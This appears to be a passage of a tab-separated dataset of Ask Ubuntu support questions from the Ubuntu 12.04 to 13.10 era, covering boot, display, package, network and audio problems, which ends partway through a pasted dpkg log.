378146	screen tearing on external monitor when playing videos	i have mpv installed in ubuntu 13.10 , and it works great as a video player when i 'm using it on my laptop 's display , but when i connect an external monitor through hdmi and play the video there , there is a lot of noticeable tearing . this is not unique to mpv , i 've tried using mplayer and the tearing still occurs . the only exception for both mpv and mplayer is if i set the video output driver to xv ; however this has its own drawback in the form of ugly video scaling , so i 'd like to avoid having to use this . the video output driver that mpv is using normally is opengl ( -- vo=opengl ) . i 've also tried vaapi , but the same tearing is there . unfortunately , i ca n't try using vdpau since there is n't any way to get that working with bumblebee on my optimus laptop . someone suggested using the environment variable __gl_sync_display_device= '' dfp-0 '' to force vsync on my external monitor rather than my laptop monitor . it does seem to have some effect , since the tearing now happens on my laptop monitor , but it also continues on the external . i 'm guessing that `` dfp-0 '' is n't actually the right identifier for the external monitor , but i do n't know how to find the right one .
378152	xubuntu does n't see php packs	i installed xubuntu and then installed php5 , mysql-server , apache2 . when i try to serve my php scripts , php says it ca n't find mcrypt extension . i installed it . it surely is installed , but php cli still says it 's not there . how can i fix this ? thank you very much . edit : here 's the output of screen : laravel requires the mcrypt php extension .
378154	cant go back to windows ?	ok so here is my problem ... when i installed ubuntu , i encrypted everything for security reasons but now i need to switch back to windows and i can not boot from cd or when i boot the cd in wine it says : windows setup can not find a location to store temporary installation files . to install windows , make sure that partition on your boot disk has at least 683 megabytes ( mb ) of free space . error code : 0x80070490 i 'm a total noob so if someone could explain how to go back , if possible in a easy to understand way .
378158	in xubuntu 12.04 - not finding much of a ram savings between terminal mode and gui mode ?	i have configured xubuntu 12.04 to login to terminal without any gui/displaymanager . i could see no process running related to xfce in ps -eaf|grep -i xf* but my memory consumption in top command does not show any significant improvements . in gui mode , the system was taking up 340-350mb of ram . in terminal mode also it taking up the same ram . i thought of saving good amount of memory because of no gui mode ; but in vain . what could be the issue ? please provide inputs . thanks , harish pathangay
378159	problem trying to install ubuntu	im trying to install ubuntu from usb but i got this message '' 8.749216 kernel panic - not syncing : vfs : unable to mont root fs on uknown-block ( 0,0 )
378168	i really need to access my files : ( from my previous home directory	i actually messed up with my original administrator account which is . the problem was the unity wo n't start properly . it 's just that , it only shows the background and some few icons on the top bar and nothing else . i decided to create a new user and assign administrative privilege to it . so now , i thought i could just access the home directory of , since all of my files are there , but then i 'm not permitted . i thought , i could just change the ownership and shipt it over to , so that 's what i did . i tried to chown home directory to be the ownership of . i thought , that was all okay . after i restart , and was very expecting that i could easily access the home directory of , i was surprised that the files and folders are gone ? as i 've checked on the terminal it is being unmounted . from the readme , it said to use the ecryptfs-mount-private but every time i do , it 's not working : ( from user , i tried to sudo su and then , go inside the home directory of , and entered ecryptfs-mount-private error : encrypted private directory is not setup properly i really need to get my files : ( .. what should i do ? any advice ?
378172	why do i need jackd to get sound out of gcompris ?	i recently upgraded a family computer from edubuntu 12.04 to lubuntu 13.10 , so my sons could run a newer version of gcompris . after the upgrade , i could no longer get sound out of gcompris . after some digging , i hacked together a solution where i launch it with this script : jackd -d alsa & ; gcompris ; killall jackd where that last command allows sounds from other applications again after gcompris is exited . is the need to do this because of some configuration mishap when i upgraded ?
378175	why my wifi network is hidden in ubuntu , and when i connect it , the connection in my ps3 is felled ?	in my notebook , i have windows 7 and ubuntu 12.04 . this is the current situation : in windows i connect automatically to the wifi when it starts and all the other devices ( smartphone and ps3 ) remain connected . in ubuntu the first strange thing is that my network appers hidden , so i have to connect by choosing the option to connect to hidden networks . this is not a big problem , but is very boring to do this procedure every time i use ubuntu . the problem is that when i connect in ubunt , my ps3 is disconnected of the the wifi . and if i am connected to the wifi in my notebook , i can not connect my ps3 . someone have any idea why this happens ? thank you .
378176	shut down or suspend laptop for night ?	just a simple question , should i suspend or shut down my laptop for night ( ~8 hours ) , considering that i do n't care about power consumption ? in windows i would usually make it sleep because of how long it takes to boot , but since ubuntu boots so quickly in comparison i can just shut down it if it 's better for laptop .
378179	login problem new update ?	i just updated the last 30 updates and it is not letting me login to my account but it lets me login to the guest and my pass word id write ?
378186	downloading playonlinux	i 'm downloading playonlinux to run paint tool sai , but i can not open playonlinux . when i click on it to open it , a dialog box comes up that says : `` playonlinux can not find curl ( from curl ) you need to install it to continue '' . how do i install this ? i 'm referring to this article : http : //bernaerts.dyndns.org/linux/74-ubuntu/292-ubuntu-paint-tool-sai-wacom-tablet-pressure
378187	how to change mountall to mount -a at boot ?	apparently ubuntu use mountal instead of the classic mount -a to increase boot speed . but the problem with mountall it mounts them in parallell . i need to mount drives in a specific order . how to change mountall to mount -a at boot ?
378188	initramfs prompt during install	i just want to install ubuntu and i always get initramfs prompt just after i choose `` install ubuntu '' i tried ahci , raid , sata , ide types in bios , no change . always initramfs . any ideas ?
378189	razer kraken 7.1 calibration	i am planning on buying a headset for my pc and its either going to be the razer kraken pro or the razer kraken 7.1 . the thing is that the 7.1 is a usb headset has some software for mic calibrations and sound quality which can not be run under linux . my question is this , is there similar software in linux to calibrate the 7.1 headset or should i go for the analog kraken pro ? thanks in advance !
378192	how to write a unity scope using python 3	i know python and vala are being deprecated in favor of c scopes , but the problem is the backend is almost complete and it was written in python3 . for now , i just want to see it working . i 'll think about porting it later . what are the steps i should take ? i ca n't find a single piece of documentation . i do n't know what libraries to import and what functions to implement . i could find them in the past , but it looks like they 're gone . note that i want to make a scope , not a lens . namely , i want to make a scope for the files and folders category . i 'd hate to see all the effort i 've put into this being thrown to waste , so any help will be appreciated .
378194	libncurses.so.5 : error while loading shared libraries	i tried to debug a c application with eclipse using gdb but i got the following error : error while loading shared libraries : libncurses.so.5 : can not open shared object file : no such file or directory i tried to install libncurses5 but it 's already installed . should i change the location of this package ? any idea ? this is what i got after running locate libncurses . # locate libncurses /home/sina/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , any , any , any , libncurses5-dbg , page,1 , helpful , ,187a06d92ba0b73dd50444293b7cab16 /home/sina/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , ubuntu , quantal , any , libncurses5-dbg , page,1 , helpful , ,e8f56bcf979e4c966af1cf8fcfb46b89 /home/sina/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , ubuntu , raring , any , libncurses5-dbg , page,1 , helpful , ,9e8b7962287c629e99b01502879a8f35 /home/sina/downloads/libncurses5-dbg_5.9+20130608-1ubuntu1_i386.deb /lib/x86_64-linux-gnu/libncurses.so.5 /lib/x86_64-linux-gnu/libncurses.so.5.9 /lib/x86_64-linux-gnu/libncursesw.so.5 /lib/x86_64-linux-gnu/libncursesw.so.5.9 /usr/lib/libncurses++_g.a /usr/lib/libncurses_g.a /usr/lib/debug/libncurses.so.5 /usr/lib/debug/libncurses.so.5.9 /usr/lib/debug/lib/x86_64-linux-gnu/libncurses.so.5.9 /usr/lib/debug/lib32/libncurses.so.5.9 /usr/lib/debug/lib32/libncursesw.so.5.9 /usr/lib/debug/usr/libx32/libncurses.so.5.9 /usr/lib/debug/usr/libx32/libncursesw.so.5.9 /usr/lib/x86_64-linux-gnu/libncurses++.a /usr/lib/x86_64-linux-gnu/libncurses.a /usr/lib/x86_64-linux-gnu/libncurses.so /usr/share/doc/libncurses5 /usr/share/doc/libncurses5-dbg /usr/share/doc/libncurses5-dev /usr/share/doc/libncursesw5 /var/cache/apt/archives/libncurses5-dbg_5.9-10ubuntu4_amd64.deb /var/lib/dpkg/info/libncurses5-dbg.list /var/lib/dpkg/info/libncurses5-dbg.md5sums /var/lib/dpkg/info/libncurses5-dbg.postinst /var/lib/dpkg/info/libncurses5-dev.list /var/lib/dpkg/info/libncurses5-dev.md5sums /var/lib/dpkg/info/libncurses5-dev.postinst /var/lib/dpkg/info/libncurses5 : amd64.list /var/lib/dpkg/info/libncurses5 : amd64.md5sums /var/lib/dpkg/info/libncurses5 : amd64.postinst /var/lib/dpkg/info/libncurses5 : amd64.postrm /var/lib/dpkg/info/libncurses5 : amd64.shlibs /var/lib/dpkg/info/libncurses5 : amd64.symbols /var/lib/dpkg/info/libncursesw5 : amd64.list /var/lib/dpkg/info/libncursesw5 : amd64.md5sums /var/lib/dpkg/info/libncursesw5 : amd64.postinst /var/lib/dpkg/info/libncursesw5 : amd64.postrm /var/lib/dpkg/info/libncursesw5 : amd64.shlibs /var/lib/dpkg/info/libncursesw5 : amd64.symbols
378196	allow port 25565	i 'm trying to move over my server i 've been running on port 25565 from windows to ubuntu , but when i check the status of the port after the server is running using this website : `` http : //www.yougetsignal.com/tools/open-ports/ '' , it shows the port as closed . i 've done a bit of googling and found out that if i use the command ufw allow 25565 as a superuser it should allow the port through , however , it does not seem to work for me . sudo iptables-save did not appear to show any output , and i have double checked to make sure the port is forwarded with the router .
378198	recordmydesktop error only 32bpp,24bpp and 16bpp color depth modes supported	does anyone know what my problem is exactly and how to fix it . i know i have to change my color depth but how ?
378200	ubuntu chrashes after loading part of the way	i installed ubuntu using the wubi thing , and then restarted my pc and selected ubuntu on the boot screen . but after i select it , however , it gets to the screen where i 'm supposed to log in , crashes , and shows a purple screen . how could i fix this ?
378202	ubuntu 13.10 installation stops after starting	i have successfully prepared an usb for booting . the problem is , after pc restart and changed bios settings to boot from the usb , the installation starts but just one line appears : syslinux 4.07 edd 2013-07-25 copyright ( c ) 1994-2013 h. peter anvin et al it stops all the time on the same place and nothing else happens , what can be done ?
378204	black screen when streaming video to twitch.tv	so , i 'm using a few different approaches to streaming my screen to twitch.tv . i 've used the https : //github.com/wargio/twitch-streamer-linux approach and the https : //github.com/pholey/xstreamer approach . all of them have the same results ; audio is captured and streamed , mouse is visible in the video capture , but everything else is black . i would say that the video is n't being captured at all , but the mouse is visible which is strange . i am using the default ffmpeg that comes with ubuntu and i 'm using ubuntu 13.10 . any ideas why i 'm getting that result ?
378205	apache timeout , ok on localhost	i have been staring at this for 2 hours now and ca n't figure it out . my webserver was running fine until earlier today . but now it ca n't be accessed from the internet . the server is apache2 , but that 's running fine because i can access sites using wget on the server ( localhost/sitename ) but any attempt to access the site from outside , and it times out . i 've done netstat -plnt and the response is active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 0.0.0.0:3306 0.0.0.0 : * listen 648/mysqld tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen 1056/apache2 tcp 0 0 0.0.0.0:21 0.0.0.0 : * listen 546/vsftpd tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 557/sshd tcp 0 0 127.0.0.1:25 0.0.0.0 : * listen 963/exim4 tcp 0 0 0.0.0.0:538 0.0.0.0 : * listen 968/gdomap tcp 0 0 0.0.0.0:443 0.0.0.0 : * listen 1056/apache2 tcp6 0 0 : ::22 : : : * listen 557/sshd tcp6 0 0 : :1:25 : : : * listen 963/exim4 i can ssh to the server but not ftp ( or access by www ) ping is turned off anyway so i have n't done that . i 've also ran nc -vt 1.2.3.4 80 ( not my real address ) and got connection timed out . then i checked /sbin/iptables -l and the response is chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination but even after i do sudo /sbin/iptables -i input 1 -p tcp -- dport http -j accept it still does n't work ufw status is inactive there seems to be another firewall which is accessed by a web based control panel ( it 's digital mines ) , but i 've checked and both ports 80 and 443 have rules allowing 0.0.0.0/0 i 'm at my wits end now , i am searching on the internet and just keep getting the same answers - check iptables , check ufw . any ideas ? edit one other thing , i ca n't access external websites from the server either !
378208	running pspsdk error	when i go to use pspsdk which is correctly installed into my system , i get the following error . i have tried reinstalling the libgmp3-dev but that didnt work , and i have tried creating a link using sudo ln -s /usr/lib/x86_64-linux-gnu/libgmp.so.10 /usr/lib/libgmp.so.3 which was unsuccessful . i went the directory where the file should be and it is not there , or if i create a link , it say broken link , would you like to move to recycle bin . i am lost as to what to do so all help would be appreciated
378210	install 32 bit ubuntu along side 64 bit windows 8	i need to install ubuntu 32 bit alongside windows 8 64 bit . can anyone tell me how to get windows/uefi to run the 32 bit disk ? i have disabled secure boot and gotten a 64 bit disk to run , but i need 32 . if you are wondering why , i 'm trying to fix something on my phone and the tools require 32 bit linux . i also need to either use the live dvd or actually install it . a usb or virtual machine wo n't work .
378219	13.10 usb audio interface keeps disconnecting and reconnecting	i recently purchased a scarlett 2i2 audio interface largely because it seemed to have favorable reviews from linux users . it worked for for about a day before it started to have this problem where , according to dmesg , it randomly disconnects and reconnects . it does this roughly once a minute . if the jack audio connection server is running when this happens all audio cuts out , it 's process takes up 100 % cpu of whichever core it 's on and requires a kill -9 to put and end to it . i upgraded from 13.04 to 13.10 and that seemed to fix the issue for about a day again , but it has returned . i 'm on a system 76 galago ultrapro . here 's a sample of my dmesg output : [ 2456.394736 ] usb 3-3 : usb disconnect , device number 25 [ 2456.677355 ] usb 3-3 : new high-speed usb device number 26 using xhci_hcd [ 2456.693800 ] usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 2456.693806 ] usb 3-3 : product : scarlett 2i2 usb [ 2456.693810 ] usb 3-3 : manufacturer : focusrite [ 2532.088650 ] usb 3-3 : usb disconnect , device number 26 [ 2532.369945 ] usb 3-3 : new high-speed usb device number 27 using xhci_hcd [ 2532.386336 ] usb 3-3 : new usb device found , idvendor=1235 , idproduct=8006 =0 [ 2532.386340 ] usb 3-3 : product : scarlett 2i2 usb [ 2532.386341 ] usb 3-3 : manufacturer : focusrite
378222	set libreoffice localization in command line	i installed libreoffice 4 in an ubuntu 12.04 server environment to convert files ( ppt , exel , word ) into pdf while uploading . how can i configure the libreoffice localization in command line so that it support chinese character ? thanks
378223	how to stop ubuntu from talking to me ?	the title may sound silly , but on ubuntu 13.10 , i 'm getting frequent audible notifications using text to speech . is this the `` speech dispatcher '' and how can i disable it ?
378224	[ screen is terminating ] , but never terminates	i recently ran into an issue on my ubuntu 12.10 server that i ca n't seem to find a solution for . from my server i run a couple of minecraft servers on different ports , usually to start the servers i would use the following command . screen -s minecraft java -xmx2048m -jar craftbukkit.jar nogui there was never a problem until recently , as soon as i run the command it outputs [ screen is terminating ] no matter what privileges/account i 'm under , sudo , root , a normal user , none of them . all return the same thing . i 've tried rebooting the entire server , wiping all screens screen -wipe . i 've also tried listing all the screens thinking that it would expose the screen that is still `` terminating '' , but all it returns is no sockets found in /var/run/screen/s-user . what else can i do ?
378226	qjackctl alsa connections , what connects to what ?	trying to get my guitar going via midi usb cord and i just need to know what connects to what . here is a picture .
378228	i ca n't boot ubuntu : kernel not appropriate	i downloaded ubuntu 12.__ and burned it onto a cd . it installed and was working well . but i wanted to remove the windows 7 os which was using my memory and slowing down my computer . i must have deleted an important file because now ubuntu will no longer boot up from my cd . it keeps saying : this kernel requires an x86-64 cpu but only detected an i686 cpu . unable to boot-please use a kernal appropriate for your cpu i 've changed the bios settings numerous times to disable and enable the intel , and also the menu that says : boot cd rom first , second etc . did i completely wipe out my computer or is there something i can do to fix it ?
378232	using oracle virtualbox to boot ubuntu server 13.10	i booted it up then selected the language but then it says this kernel requires a x86-64 cpu . unable to boot .
378234	wireless driver for dell inspiron 1545	i have downloaded drivers for my wireless card but i do n't have a clue , as to how i install them . if anyone is able to instruct me how to install them it would be greatly appreciated
378237	how to thunderbird emails on a windows drive ( dual boot )	i have a dual boot windows-ubuntu laptop . i want to use thunderbird as my email client but i want to store all the emails to windows drive as my ubuntu partition has low space . is there a way i can configure it to store all of the profile and messages to anyother location ?
378239	what happens when i upgrade ubuntu ?	i just need some advice on upgrading from 12.10 to 13.04 . what happens when i upgrade ? do my files , settings , and internet bookmarks stay intact ? i ca n't find any resources to help me with this .
378243	uninstalling java ( only ) after installing restricted extras	i 've googled it and searched a lot but did n't found specifically targeted question in this way . so i really do n't want java . i want to get rid of it . when seeing it in software updater , it seems packed in restricted extras and is not showing as separate installed . i want to keep all others but uninstall this one . please help . i 'm using xubuntu 13.10. and updated it completely .
378247	who is at the highest level of command at ubuntu ?	just like my question asks - who is at the head of ubuntu and how do i contact them ?
378249	how to install windows software on ubuntu 13.10 ?	i am having many apps on windows which are really necessary for me but on ubuntu 13.10 they do n't work as it 's a different operating system . but i am not getting these software ( like maya , adobe photoshop , nukes , etc . ) for ubuntu and i am in no mood to try their alternatives . so i want to install them on my ubuntu operating system but it seems impossible for me . so is there any way to install windows applications in ubuntu ?
378253	problem in samba configuration : ibus-warning owner is not root	i keep getting this when i type : sudo gedit /etc/ ... ( gedit:3698 ) : ibus-warning ** : the owner of /home/johnub/.config/ibus/bus is not root ! ( gedit:3698 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files it opens gedit anyway , and then when i try to save the file ( which was originally blank and i had to create a new file entirely ) it tells me : could not find the file /home/johnub/etc/samba/smb.conf so this is the very beginning of my network problems . thus so far , i have done remove purge samba and reinstall . by way of confession , i followed a couple of online tutorials and may have done some stupid things to the usernames and passwords on my system . ( which i have tried to correct . ) how can i fix this ?
378255	dual boot windows 8 ( uefi / gpt ) with ubuntu and boot-repair	i 'm asking this question because it seems like every single answer is install ubuntu breaking windows 8 - > boot from live cd - > run boot-repair - > done . what happens when boot repair wo n't work ? i tried to install ubuntu 12.04 lts x64 as usually and noticed that the installer did not recognize any other os in the disk but it recognized the contents of it . so i went ahead and proceeded to install and swap in the empty space i created earlier ( separately , i meant ) and the boot loader in sda ( like i 've done so many times in non-uefi machines ) . but after the installation was completed , i was unable to get grub working , it just booted directly into ubuntu with no grub and then i followed the magic boot repair path and ended up with a black screen and a grub > prompt . i searched everywhere and all i found was boot-repair . i gave up and went to recover the system which deleted all the contents of my drive to its original state ( which is fine since the system is new ) . i really need ubuntu for work and i ca n't find another way to install it anywhere . some info : windows 8 came pre-installed in uefi mode ( checked via power-shell ) . i disabled fast-boot and secure-boot ( no 'efi boot ' option in my bios ) before the install . ubuntu started in uefi mode when installing ( confirmed by the look of the 'try ubuntu or install it menu ) . my bios looks exactly like a normal bios , no fancy looking menu like many videos i 've seen ( no mouse support either ) . is there anything else i can do ?
378258	ca n't set a folder on another drive as default downloads folder	what i want : 1 . set a folder which is located on another drive ( /media/vorpall/27dcd6c93788ce6e/media/downloads ) as `` downloads '' folder at home . 2 . new `` downloads '' folder should have an arrow icon on it ( just as default one ) 3 . the folder should show up in places what i did : 1 . deleted existing `` downloads '' folder from home 2 . made a link to `` /media/vorpall/27dcd6c93788ce6e/media/downloads '' 3 . pasted it to home 4 . opened user-dirs.dirs , changed string xdg_download_dir= '' $ home/ '' to xdg_download_dir= '' $ home/downloads '' and saved the file . now `` downloads '' folder has an arrow icon . 5 . rebooted my laptop . now `` download '' link at home is broken . there 's a lock icon on it . 6 . then i went to `` /media/vorpall/27dcd6c93788ce6e/ '' and the link got healed ! it is not broken any more , although it is now an ordinary folder without arrow and it is not on places . that is because user-dirs.dirs got updated for some reason and now xdg_download_dir= '' $ home/downloads string is again xdg_download_dir= '' $ home/ '' i think that happens because ubuntu probably checks home folder for broken links and only then loads other drives . is there a way to make ubuntu load drive with `` /media/vorpall/27dcd6c93788ce6e/media/downloads '' before checking for broken links ? or there 's a simpler way to solve the issue ? there must be ! please help me guys . i am a second day ubunty user .
378264	can not install graphics tablet ; cd drive broken and driver not found online	okay , so i purchased a medion usb graphics pad ( p82019 md86935 ) . i can not install the driver software because my cd drive is broken and no longer runs discs which is essential because what i need to is configure input devices and change the settings of the tablet pen to run the program gimp . i 've gone onto www.medion.com where you can install the drivers off the site . however my product that i purchased is not listed on it . so i can not install the driver software without having to buy a new computer that has a working disc drive or getting my disc drive fixed . all that i need to do is to adjust my graphics tablet pen pressure settings but can not do that without installing the drives required ! is there any other possible way ! ?
378265	hebrew lyx is lacking 1-8 characters	i 'm having a problem with the numbers in `` hebrew lyx '' keyboard layout in 13.10. in 13.04 that layout had numbers and was great but now , without those numbers , is kind of lass usable . any help would be most welcome . ps would have posted an image but ... that damn reputation points system ...
378267	unusual bluetooth connection problem	i am trying to connect a bluetooth device with my ubuntu machine , sometimes ubuntu detects the device ( every and any bluetooth device ) , sometimes it doesnât detect any device whatsoever . i dont know what is the problem , same device works fine with the same machine when used with windows os . i cant imagine the source of the problem , any pointers ?
378268	how to boot up from usb ?	hi how can i boot up a usb.i already install ubuntu iso . and create a bootable usb using pendrive..i restarted my computer but the usb wont boot up.what should i do.please answer me as soon as possible ..thank you
378273	setting up qtile to work with xrdp	i 'm trying to get a basic rdp gui for a vps server i have running precise . qtile seems like the perfect lightweight interface for remote desktop . however , it 's written in python and xrdp does n't seem to work with it . whenever i connect its just a black and white tiled screen ( which is default for windows remote desktop connection for when its just a blank screen ) does anyone know how i can set it up so it will work ?
378275	unable to install clamav	while installing clamav i got the following error : andrei @ andrei-h61m-ds2 : ~ $ sudo apt-get clamav e : invalid operation clamav andrei @ andrei-h61m-ds2 : ~ $ sudo apt-get clamav e : invalid operation clamav andrei @ andrei-h61m-ds2 : ~ $ sudo apt-get -f install clamav reading package lists ... done building dependency tree reading state information ... done clamav is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 1 not fully installed or removed . need to get 0 b/46,3 mb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing google-chrome-stable ( -- configure ) : package google-chrome-stable is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : google-chrome-stable e : sub-process /usr/bin/dpkg returned an error code ( 1 ) andrei @ andrei-h61m-ds2 : ~ $
378276	how do i boot back to my windows os ?	help ! i ca n't get back to my windows os ! ! ! i tried boot repair , but i still ca n't figure out how to boot to my windows 8.1 . when i first installed ubuntu , i had this problem , then i eventually got back to windows somehow . but when i got back there the windows boot loader would n't show ubuntu as one of my options , and i could n't get back to ubuntu . so i downloaded easybcd in an attempt to fix this problem , and i made sure windows and ubuntu were both set up as boot options . i first set windows as the default , but that still did n't work , so then i changed the default to ubuntu , and that did the trick , but now i 'm stuck in ubuntu again and i ca n't get out . no matter how many times i restart , i ca n't get back to my windows . i 'm a college student just starting out in cs so i figured i should install ubuntu on a partitioned drive to be able to code more easily than with windows . but all my files for school are on the windows partition , so it 's pretty damn important that i find a way to get back there . as i mentioned , i somehow got back to my windows once , so i know that i did n't accidentally wipe my drive when i installed ubuntu , but at the moment i ca n't seem to boot to it . and if i do manage to get back , i suspect it wo n't be easy to get back into ubuntu either . i really need to know how to set it up so when i boot up , the windows boot manager pops up that lets me choose between ubuntu and windows . sorry for the wall of text , but it 's 4am and i 'm getting kind of worried haha
378278	unable to adjust brightness on a sony vaio	i am having a sony vaio sve1513byn . i have installed ubuntu 13.10 . once i set brightness of my laptop and then after i restart my laptop it is changed . brightness is going full as default .
378279	update manager not working and software center crashes	on running the update manager , following message shows up e : encountered a section with no package e : problem with mergelist/var/lib/apt/lists/oem.archive.canonical.com_updates_dists_precise-oem-sp1_public_i18n_translation-en the package list could not be opened or parsed . installed packages have unmet dependencies . software center also crashes as soon as it starts .
378280	hebrew fonts in picasa 3.9 wine 1.4.1 kubuntu 13.10 look as empty squares	i 've got a fresh kubuntu 13.10 64 bit with wine 1.4.1 on it . fonts seemed to install without a problem ( how can i check that ? i 've installed culmus manually and msfft core with wine ) . importing my albums ( not web albums ) from my winxp machine went smoothly except for the fact that album names that have hebrew letters will show up as empty rectangles ( on the left menu bar ) . if i choose one and right click to `` edit album description '' i can see the hebrew name just fine . i 've tried the suggestion from mosestruong from here but that only made the letters disappear totally .
378282	how to add default icon in qt widget application	i am trying to develop a simple qt app , i would like icon for the toolbar buttons , how can i standard icons for these toolbar buttons , new , open , close etc
378287	installing ubuntu 13.10 in vaio	everything works properly when i am booting from usb ( trial mode ) . but when i am trying to install , it shows that it didnot find any operating system but i do have windows 8 preinstalled . when i did click something else , i am also able to see my diskpartitions and an install click option.i am fearing that something will happen to windows 8 when i install ubuntu 13.10. there is a chance that i may not access windows 8 after installing ubuntu .
378293	linking a windows terminal application	i have downloaded windows terminal application namely pdf2djvu ( equivalent of this i ca n't find under linux ) as the name implies it converts pdf to djvu documents ( compact in size ) ... i have placed the contents of pdf2djvu in my wine 'program files ' directory now i can easily use this via cd `` /home/usama/.wine/drive_c/program files/pdf2djvu-0.7.14 '' wine pdf2djvu.exe -o sample.djvu -v pdffile2convert.pdf now its laborious ... i just want to create a link in /usr/bin to use pdf2djvu as native linux executable . my following attempts has thus far failed 1 ] create a bash file & linking it to /usr/bin # ! /bin/bash wine `` /home/usama/.wine/drive_c/program files/pdf2djvu-0.7.14/pdf2djvu.exe '' 2 ] using autokey phrase placement wine `` /home/usama/.wine/drive_c/program files/pdf2djvu-0.7.14/pdf2djvu.exe '' -o ~/documents/sample.djvu -v `` '' in either case terminal reports no input file specified
378294	how do you compile games with unity3d	i have created a game with unity3d and compiled it for mac and windows . but how do you build it for ubuntu , there is a option for linux but the file wo n't run when i click on it . there is n't anything in the unity manual and no guides online . is there something i missed ? am i ment to do something with the file unity gives me ? the file that unity3d creates is a .86 when i click on it i get `` there is no application installed for `` executible '' files . '' i have tried various solutions online on how to open this file but it still wont open
378298	where to find package manager in xubuntu 13.10	i 'm a newbie to linux and i have a xubuntu 13.10 relase installed on my pc . i need to install some packages for web development but i can not find the package manager utility in the applications menu . could somebody tell me where i can find it ?
378299	dualbooting windows 7 and ubuntu on 2 hardisks	i have an ssd with windows 7 on it and a 1tb hdd with 200 gb storage to be accessed by windows 7 . i want to install ubuntu on my hdd without erasing what i have on it . i have checked some videos but they show it on 1 hard disk and some people say to delete the partitions on the hdd to make partitions for ubuntu . basically : can i install ubuntu on my second hdd without deleting what is on it will i still be given a choice to dual boot
378304	not able to login ( stuck at purple login screen ) 12.04	i 'm a newbie and i did install ubuntu 12.04 last month . i tried to remove tomcat6 from the system . after that i am not able to log-in . all the time , after entering my password , i could see the following message in the black screen for very short time could not write bytes : broken pipes *starting the winbind daemon winbind saned disabled ; edit etc/default/saned *tomcat 6 not installed *checking battery state ... . after reading many blogs , i logged in tty and i can see the below message 11 packages can be updated . 5 updates are security updates -bash : /etc/profile : line 34 : syntax error : unexpected end of file then i am being redirected back to the purple logging screen , and does n't proceed . how can i resolve this ?
378305	packages for web development	could somebody tell me what packages do i need to download to have an apache server on my pc and to be able to use php , jquery , javascript and mysql ? thanks in advance !
378308	can find network but can not connect to it ubuntu 13.10	i 'm new to ubuntu and i just installed it about a month ago , but yesterday my computer suddenly stopped being able to access the internet . i am able to find the networks but i am unable to connect to them even when the signal strength is high . i tried connecting using a wired connection as well but it still did n't work . this is not a problem with my wifi , as it can work with my other computers fine .
378310	how can i recover my system after attempting to install experimental packages ?	i 've been having issues with extremely frequent screen lockups and scrambled text . one possible fix was in mesa 9.2.3 . unfortunately , the latest version in the official repos was mesa 9.2.1 . hence , i tried installing all the debs from here : a ppa marked `` do n't use this '' . sigh . anyway , i got a whole bunch of dependency errors . ( ignore the lines about the new kernel . that had previously installed . ) $ sudo dpkg -i *.deb ( reading database ... 357629 files and directories currently installed . ) preparing to replace libegl1-mesa : amd64 9.2.1-1ubuntu3 ( using libegl1-mesa_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement libegl1-mesa : amd64 ... selecting previously unselected package libegl1-mesa-dbg : amd64 . unpacking libegl1-mesa-dbg : amd64 ( from libegl1-mesa-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libegl1-mesa-dev . unpacking libegl1-mesa-dev ( from libegl1-mesa-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libegl1-mesa-drivers : amd64 9.2.1-1ubuntu3 ( using libegl1-mesa-drivers_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement libegl1-mesa-drivers : amd64 ... selecting previously unselected package libegl1-mesa-drivers-dbg : amd64 . unpacking libegl1-mesa-drivers-dbg : amd64 ( from libegl1-mesa-drivers-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libgbm1 : amd64 9.2.1-1ubuntu3 ( using libgbm1_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement libgbm1 : amd64 ... selecting previously unselected package libgbm1-dbg : amd64 . unpacking libgbm1-dbg : amd64 ( from libgbm1-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libgbm-dev . unpacking libgbm-dev ( from libgbm-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libgl1-mesa-dev 9.2.1-1ubuntu3 ( using libgl1-mesa-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement libgl1-mesa-dev ... preparing to replace libgl1-mesa-dri : amd64 9.2.1-1ubuntu3 ( using libgl1-mesa-dri_9.2.3~brppa-0ubuntu1_amd64.deb ) ... de-configuring libgl1-mesa-dri : i386 ... unpacking replacement libgl1-mesa-dri : amd64 ... preparing to replace libgl1-mesa-dri-dbg : amd64 9.2.1-1ubuntu3 ( using libgl1-mesa-dri-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement libgl1-mesa-dri-dbg : amd64 ... selecting previously unselected package libgl1-mesa-dri-experimental : amd64 . unpacking libgl1-mesa-dri-experimental : amd64 ( from libgl1-mesa-dri-experimental_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libgl1-mesa-dri-experimental-dbg : amd64 . unpacking libgl1-mesa-dri-experimental-dbg : amd64 ( from libgl1-mesa-dri-experimental-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libgl1-mesa-glx : amd64 9.2.1-1ubuntu3 ( using libgl1-mesa-glx_9.2.3~brppa-0ubuntu1_amd64.deb ) ... de-configuring libgl1-mesa-glx : i386 ... unpacking replacement libgl1-mesa-glx : amd64 ... selecting previously unselected package libgl1-mesa-glx-dbg : amd64 . unpacking 